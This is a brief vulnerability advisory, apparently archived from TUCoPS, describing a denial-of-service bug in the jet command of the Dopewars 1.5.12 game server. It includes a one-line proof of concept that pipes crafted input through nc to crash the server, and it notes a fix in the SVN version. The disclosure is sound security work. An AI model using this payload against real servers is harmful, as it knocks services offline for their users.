TUCoPS :: HP Unsorted D :: bt-21758.htm

Dopewars 1.5.12 Server Denial of Service
Dopewars 1.5.12 Server Denial of Service
Dopewars 1.5.12 Server Denial of Service


## Description ##=0D
=0D
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.=0D
=0D
## POC ##=0D
=0D
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902=0D
=0D
## Fix ##=0D
=0D
This issue is resolved in the SVN version of the application.=0D
=0D
## Discovered by Doug Prostko=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH